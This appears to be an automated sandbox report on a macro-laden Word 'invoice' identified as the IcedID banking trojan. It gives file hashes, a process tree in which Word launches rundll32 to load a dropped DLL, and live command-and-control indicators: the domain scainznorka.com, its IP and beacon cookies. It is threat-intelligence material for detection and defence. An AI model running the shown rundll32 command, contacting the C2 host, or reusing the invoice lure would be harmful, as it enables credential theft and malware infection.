Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    152s
  • max time network
    96s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    26/09/2022, 17:27 UTC

General

  • Target

    nabankco,invoice,09.26.docm

  • Size

    866KB

  • MD5

    6cd073362222caa889f3489c86281319

  • SHA1

    8ec1e49183949c2151a4f347a30eb7b9618a55de

  • SHA256

    b63410aee1ea13f6175d41c6e980606cca09a12069f68e49b330d01f3e75a777

  • SHA512

    2ac3b8e3a61191d644a59819d494cca8eb740ea1748fd15babd362b784e0f5192dc330e3f3a4791bd743ad4b5fb36aadc9e3fb589d66f88c3c1fc04d113be77d

  • SSDEEP

    12288:Na+VE9j2y+1JbeQbntrws6/GYzw6OFokpXfiiGef/DEs9d/+CfDDK2HiFl6htlPJ:Na+V2jUeQRI5wPN/AwDKiZJ

Malware Config

Extracted

Family

icedid

Campaign

742081363

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\nabankco,invoice,09.26.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1184
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32 C:\ProgramData\68495005.535,PluginInit
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:900
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\ProgramData\68495005.535,PluginInit
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:944
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:636

    Network

    • flag-us
      DNS
      scainznorka.com
      rundll32.exe
      Remote address:
      8.8.8.8:53
      Request
      scainznorka.com
      IN A
      Response
      scainznorka.com
      IN A
      165.227.187.5
    • flag-us
      GET
      http://scainznorka.com/
      rundll32.exe
      Remote address:
      165.227.187.5:80
      Request
      GET / HTTP/1.1
      Connection: Keep-Alive
      Cookie: __gads=742081363:1:7125:29; _gat=6.1.7601.64; _ga=1.198354.1970169159.94; _u=4F5258474B4B5A43:41646D696E:45363342323644393543323033394639; __io=21_999675638_2867687379_27515722; _gid=12FF3DD7EDBD
      Host: scainznorka.com
      Response
      HTTP/1.1 403 Forbidden
      Server: nginx
      Date: Mon, 26 Sep 2022 17:27:44 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
    • flag-us
      GET
      http://scainznorka.com/
      rundll32.exe
      Remote address:
      165.227.187.5:80
      Request
      GET / HTTP/1.1
      Connection: Keep-Alive
      Cookie: __gads=742081363:1:7125:29; _gat=6.1.7601.64; _ga=1.198354.1970169159.94; _u=4F5258474B4B5A43:41646D696E:45363342323644393543323033394639; __io=21_999675638_2867687379_27515722; _gid=12FF3DD7EDBD
      Host: scainznorka.com
      Response
      HTTP/1.1 403 Forbidden
      Server: nginx
      Date: Mon, 26 Sep 2022 17:28:45 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
    • 165.227.187.5:80
      http://scainznorka.com/
      http
      rundll32.exe
      506 B
      792 B
      5
      4

      HTTP Request

      GET http://scainznorka.com/

      HTTP Response

      403
    • 165.227.187.5:80
      http://scainznorka.com/
      http
      rundll32.exe
      456 B
      788 B
      4
      4

      HTTP Request

      GET http://scainznorka.com/

      HTTP Response

      403
    • 165.227.187.5:80
      rundll32.exe
    • 8.8.8.8:53
      scainznorka.com
      dns
      rundll32.exe
      61 B
      77 B
      1
      1

      DNS Request

      scainznorka.com

      DNS Response

      165.227.187.5

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\68495005.535

      Filesize

      532KB

      MD5

      006f3eb63e3d7cc9c11f70434fe2764f

      SHA1

      63b78298c083e147bd9f2d586b3fa6134db2e4bc

      SHA256

      ff22f8e204e940c2ce2652c5be030577782bd90274b1113a8f659d0d18abe5da

      SHA512

      561ac296e6dfaf79693a3837980619712d865cdd78332773e1ad331b4d2b839f0371c3c49ec15086463001dc1c92ec9b0ecc7603e94bac8bd74d6756f8187c71

    • \ProgramData\68495005.535

      Filesize

      532KB

      MD5

      006f3eb63e3d7cc9c11f70434fe2764f

      SHA1

      63b78298c083e147bd9f2d586b3fa6134db2e4bc

      SHA256

      ff22f8e204e940c2ce2652c5be030577782bd90274b1113a8f659d0d18abe5da

      SHA512

      561ac296e6dfaf79693a3837980619712d865cdd78332773e1ad331b4d2b839f0371c3c49ec15086463001dc1c92ec9b0ecc7603e94bac8bd74d6756f8187c71

    • \ProgramData\68495005.535

      Filesize

      532KB

      MD5

      006f3eb63e3d7cc9c11f70434fe2764f

      SHA1

      63b78298c083e147bd9f2d586b3fa6134db2e4bc

      SHA256

      ff22f8e204e940c2ce2652c5be030577782bd90274b1113a8f659d0d18abe5da

      SHA512

      561ac296e6dfaf79693a3837980619712d865cdd78332773e1ad331b4d2b839f0371c3c49ec15086463001dc1c92ec9b0ecc7603e94bac8bd74d6756f8187c71

    • memory/944-228-0x00000000000A0000-0x00000000000A6000-memory.dmp

      Filesize

      24KB

    • memory/1184-85-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-91-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-58-0x0000000074BB1000-0x0000000074BB3000-memory.dmp

      Filesize

      8KB

    • memory/1184-59-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-88-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-61-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-62-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-63-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-64-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-65-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-66-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-67-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-68-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-69-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-70-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-71-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-72-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-73-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-74-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-75-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-76-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-77-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-78-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-79-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-80-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-81-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-82-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-83-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-84-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1184-86-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-87-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-60-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-57-0x0000000070D2D000-0x0000000070D38000-memory.dmp

      Filesize

      44KB

    • memory/1184-113-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-89-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-92-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-93-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-94-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-95-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-96-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-97-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-98-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-99-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-100-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-101-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-102-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-103-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-104-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-105-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-106-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-107-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-108-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-109-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-110-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-111-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-112-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-90-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-114-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-115-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-116-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-117-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-118-0x000000000079E000-0x00000000007A2000-memory.dmp

      Filesize

      16KB

    • memory/1184-213-0x000000000079E000-0x00000000007A0000-memory.dmp

      Filesize

      8KB

    • memory/1184-220-0x0000000070D2D000-0x0000000070D38000-memory.dmp

      Filesize

      44KB

    • memory/1184-55-0x000000006FD41000-0x000000006FD43000-memory.dmp

      Filesize

      8KB

    • memory/1184-54-0x00000000722C1000-0x00000000722C4000-memory.dmp

      Filesize

      12KB

    • memory/1184-231-0x0000000070D2D000-0x0000000070D38000-memory.dmp

      Filesize

      44KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.